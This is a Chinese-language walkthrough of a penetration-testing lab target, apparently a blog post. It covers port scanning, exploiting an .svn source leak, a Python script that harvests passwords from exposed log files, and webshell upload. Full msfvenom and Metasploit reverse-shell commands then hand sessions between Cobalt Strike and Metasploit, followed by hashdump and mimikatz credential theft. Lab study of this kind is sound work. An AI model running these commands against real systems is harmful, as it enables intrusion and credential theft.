暗月渗透实战靶场-项目六(上)
暗月渗透实战靶场-项目六
环境搭建
使用的是暗月提供的环境
直接虚拟机运行即可
设置网络环境
网卡配置的时候为了方便直接使用的是暗月的vm19的网卡配置的内网环境
00x1-信息搜集
我们已经知道目标主机
192.168.1.150
使用masscan
sudo masscan -p 1-65535 192.168.1.150 --rate=1000
结果
开启的有445、3389、80的特殊端口
断定是win服务器
访问
直接访问是被拒绝的、典型的phpstady。
nmap扫描
这里暂时不管、我们继续扫描、查看开放的端口之后使用nmap就进行扫描
sudo nmap -p 3306,445,3389,80,47001,49152,49156,49153,135,49157 -sS -sC -A 192.168.1.150 -oA web150-p
这里我们还发现了目标机使用的dns解析的地址信息
由于前面我们在访问的时候就知道是访问不了的肯定是需要进行域名的绑定的
绑定完成后在访问
一个信用贷的平台
使用whataweb查询网站的cms
whatweb www.webhack123.com
使用的是thinkphp的框架
查询网站目录信息
使用dirsearch
python3 dirsearch.py -u "www.webhack123.com" -e *![](https://gitee.com/jokerjq/like4h-blog-img/raw/master/images/image-20220118232949286.png)
使用gobuster
gobuster dir -u http://www.webhack123.com -w /usr/share/wordlists/dirb/big.txt -t 50
使用dirmap
python3 dirmap.py -i http://www.webhack123.com -lcf
项目
https://github.com/H4ckForJob/dirmap
00x2-.svn泄露并利用
网站下载
在三个工具中我们发现是由.svn文件的、这里我们使用工具进行下载
我们先去进行访问一下
发现是有内容的
使用工具进行下载
这里我们使用的工具是
进行下载
./rip-svn.pl -v -u http://www.webhack123.com/.svn
然后我们可以看到下载的结果
将源码下载下来
00x3-网站审计
虽然我们将文件下载了下来但是发现是没有下载本应该存在的wc.db的数据库文件的、有的文件是需要我们自己进行下载的
完成下载
wc.db数据库查看
对于db数据库我们可以使用sqlite软件进行打开
对于这个数据表的作用我们只是为了查看网站的历史使用记录的情况、为了方便我们摸清楚网站的目录结构、这里我们是已经下载了网站的整个目录文件的
源码审计
这样我们对于整个网站的基本目录结构已经是知道了、查看有无后台管理登录页面
网站的教程里面有一些配置信息的所在地
发现后台管理的地址
http://admin.webhack123.com/
这里还是需要进行域名绑定的
然后我们再次访问
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jPsT0Smc-1643374933273)(https://gitee.com/jokerjq/like4h-blog-img/raw/master/images/image-20220119215406318.png)]
这里就需要我们获取数据库管理员账号密码
接着往下看我们还掌握数据库的信息
网站的日志文件
对于这种有暴露完整的日志文件的、我们可以在日志文件中查看一下有无管理员修改密码的操作的记录、
我们可以在工具中的搜索功能自己进行搜索
log日志遍历-寻找password
也可以写个脚本自己遍历文件的内容
但是这种方法只能是查找源码上面备份的、我们是不确定这个备份是不是最新的、所以我们要根据这个格式查找最新年份的log日志文件
脚本
#coding:utf-8
import requeststesturl= "http://www.webhack123.com/App/Runtime/Logs/18_07_04.log"url = "http://www.webhack123.com/App/Runtime/Logs/"#关于日期
def logtime(url,yeas):nurls = []for month in range(1,13):for day in range(1,33):if month < 10:if day < 10:nurls.append(url+"%s_0%s_0%s.log" %(yeas,month,day))else:nurls.append(url+"%s_0%s_%s.log" %(yeas,month,day))else:if day < 10:nurls.append(url+"%s_%s_0%s.log" %(yeas,month,day))else:nurls.append(url+"%s_%s_%s.log" %(yeas,month,day))return nurls#print(logtime(url,19))yeas = [18,19,20,21]for i in yeas:nurls = logtime(url,i)#print(nurls)for j in nurls:result = requests.get(j)if result.status_code == 200:print(j)if "password" in result.text:with open("webpasswd.txt","a",encoding="utf-8") as f:f.write(result.text)
在次查找
得到最新的密码
74c774ef39b5b977c1fd59dbfc73c3e380a65aa3
解密-登录
然后进行MD5解密
但是要密码、哦豁花钱的东西咱不搞、换
somd5.com
nice
去登陆
登录成功
00x4-拿shell-查看目标机信息
先在平台逛逛、基本上管理员的用户后台都会有上传的地方的、
写个小马、getshell
查看基本信息
system权限
查看配置文件
数据库
配置文件
尝试连接数据库
查看数据表
是可以查看的
然后我们查看网卡信息
哦豁里面还有大动作
00x5-MSF+CS+冰蝎进行webshell的互联
文件上传–>cobaltstrike–>msf
cobaltstrike的getshell
制作攻击载荷
生成文件并上传
执行
cs上线
然后将sessio转发到msf上进行互联
配置msf
msfconcle
use /multi/handler
set payload windows/meterpreter/reverse_http
show options
set lhost 0.0.0.0
set lport 9999
run
在cs上新建监听器
然后将上线的session转发到这个新建的监听器上
然后等待msf上线即可
msf成功上线
冰蝎–>msf–>cs
在冰蝎3.0以后就有反弹shell直接到msf的功能了
直接选择连msf然后跟着下面的提示做就行
打开MSF
msfconcle
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
shwo options
set lhost 0.0.0.0
set port 9999
run
执行完成过后在冰蝎的页面点击matesploit连接
然后在msf上就会收到session会话
然后进行设置session转发到cs上
先将msf上获得的session放到后台运行
background
然后使用 exploit/windows/local/payload_inject来注入一个新的payload到session中设置新的payload
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set LHOST 192.168.1.130 //cs主机地址
set LPORT 4444 //随意设置监听端口,需要和cs保持一致
set session 1 //设置需要派送的meterpreter
set DisablePayloadHandler true //禁止产生一个新的handler
回到cs上建立新的监听器
然后启用监听器
在msf里面执行run
成功上线
文件上传–>MSF–>CS
打开MSF
在msfvenom上生成攻击载荷
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.130 LPORT=9999 -f exe > shell.exe在MSF上进行监听use /multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 0.0.0.0 //cs主机地址
set LPORT 9999 //随意设置监听端口,需要和cs保持一致
show options
run
将msfvenom生成的shell.exe上传到目标中
然后执行shell.exe的文件
这时候会在msf收到session会话
然后在将会话转发到cs上-就跟步骤二是一样的转发方式
当然以上这些互相的转发时对于cs上线使用的都是http协议的但是对于Linux的payload中是没有http协议的payload的
00x6-对目标机器进行信息搜集
我们可以在MSF里面进行执行命令
查看一下基本的信息
首先是获取用户的密码
hashdump
还可以使用这个命令查看
run post/windows/gather/smart_hashdump
or
也可以进入mimikatz交互(针对win开发的模块)
load mimikatz
查看其他配置及的证书文件
一般密码是由存在这里的
creds_kerberos
写在最后
欢迎大家加入星球一起学习、里面有各种红队资源、工具、各种小技巧啊!
暗月渗透实战靶场-项目六(上)相关推荐
- 暗月渗透实战靶场-项目八(下)
00x6-tomcat主机发现 tomcat主机信息搜集 网卡信息 ipconfig /all 主机名tomcat-web 两块网卡 路由器信息 arp -a 结果 接口: 10.10.1.129 - ...
- 全!CTF靶场、渗透实战靶场总结 (适合收藏)
CTF靶场.渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门.提升自己.丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯): 渗透实战靶场: ...
- 无限渗透实战(2)--绕过认证上校园网
校园网大家都熟悉,一般都是开放的,然后连接之后有个登录页面,认证之后就可以上网了,那么我们怎么绕过认证直接上网 首先还是开始监听周围的ap,可以看到有许多的校园网 那么我们就需要开始监听周围的校园网, ...
- [HTB]HackTheBox-Pandora 渗透实战靶场
- 【HTB】HackTheBox-medium-Popcorn 国外渗透实战靶场
Majority Papers为笔者学习所整理的内容,本意希望借此知识输出方式达到筑牢基础的效用.如若有不足之处,还望大哥哥海涵.向值得学习的人学习,向前辈们致敬!
- 暗月渗透测试项目-五(上)
暗月渗透测试项目五 准备工作 环境搭建 使用的是暗月提供的环境 直接虚拟机运行即可 设置网络环境 网卡配置的时候为了方便直接使用的是暗月的vm19的网卡配置的内网环境 环境搭建完成 如果使用的Mac的 ...
- 【暗月内网靶场】项目六(简单的内网靶场)
暗月内网靶场 在这个项目中可以学到 如何搭建一个隧道 如何利用低版本的域环境 如何进行权限维持(影子账户,黄金票据)
- 基于 abp vNext 和 .NET Core 开发博客项目 - Blazor 实战系列(六)
基于 abp vNext 和 .NET Core 开发博客项目 - Blazor 实战系列(六) 转载于:https://github.com/Meowv/Blog 上一篇完成了博客文章详情页面的数据 ...
- VulnHub渗透测试实战靶场 - Odin:1
VulnHub渗透测试实战靶场 - Odin:1 题目描述 环境下载 NULLY CYBERSECURITY: 1靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 题目描述 Odin v ...
最新文章
- 无法删除当前已连接的用户处理办法
- boost::mutex::scoped_lock
- Flex实现分页显示功能(mx:DataGrid)
- curl命令java_Java 应用线上问题排查思路、工具小结
- MVC是架构模式,而不是设计模式
- [luoguP4142]洞穴遇险
- UIAutomator输入中文
- android 人机界面设计规范,iPhone 人机界面设计规范(中英对照)
- 将Visual Studio Code和Windows Subsystem for Linux一起使用
- 如何关闭来自苹果的个性化广告?
- max30102c语言程序,STM32驱动MAX30102源码
- win7桌面图标箭头怎么去掉
- 测试网络连接速度 http://www.phoenixtv.com.cn/home/fhkp/testspeed.htm
- App 界的一股清流 音视频应有尽有 完全按照 Material design 规范设计的 App
- UEFI 中的Gmac网卡驱动实现
- 基于Android的健康医疗论坛的设计与开发(android studio)
- 个人随笔-求学求职-工作经历-计划
- s5pv210 android4.0.3调试,如何去掉SGX540硬件加速
- 人工智能学习笔记20221008
- 01-简历设计(模板1)